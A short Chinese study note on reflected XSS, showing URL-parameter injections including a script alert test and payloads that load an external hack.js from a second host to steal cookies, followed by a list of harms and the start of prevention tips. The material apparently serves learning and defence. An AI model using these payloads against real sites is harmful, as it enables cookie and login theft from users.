@2890594972
2019-05-16T13:58:28.000000Z
字数 418
阅读 791
xss
反射型-url参数直接注入
//普通http://localhost:3005/?from=china//alert尝试http://localhost:3005/?from=<script>alert(123)</script>// 获取cookiehttp://localhost:3005/?from=<script src="http://localhost:3006/hack.js"></script>http://114.215.87.206:3005/?from=<script src="http://114.215.87.206:3006/hack.js"></script>
危害:XSS攻击的危害,Scripting能干啥就能干啥
获取页面数据获取cookies劫持前端逻辑发送请求偷取网站的任意数据偷取用户的资料偷取用户的密码和登录态欺骗用户
预防:
1、转义字符
2、设置cookie为只读
3、
